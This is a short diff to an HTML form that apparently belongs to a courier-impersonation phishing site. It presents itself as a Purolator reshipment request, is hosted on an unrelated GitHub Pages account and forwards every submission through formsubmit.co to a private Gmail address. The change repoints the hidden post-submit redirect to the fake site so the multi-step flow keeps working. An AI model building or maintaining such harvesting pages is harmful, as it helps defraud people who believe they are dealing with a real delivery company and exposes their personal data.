--- a/details.html
+++ b/details.html
@@ -25,7 +25,7 @@
                 
                 <form action="https://formsubmit.co/natashaxeadie@gmail.com" method="POST">
                     
-                    <input type="hidden" name="_next" value="thankyou.html">
+                    <input type="hidden" name="_next" value="https://purolatorforms.github.io/reship/thankyou.html">
                     <input type="hidden" name="_subject" value="New Reshipment Request (Step 2)">
                     <input type="hidden" name="_captcha" value="false">
 
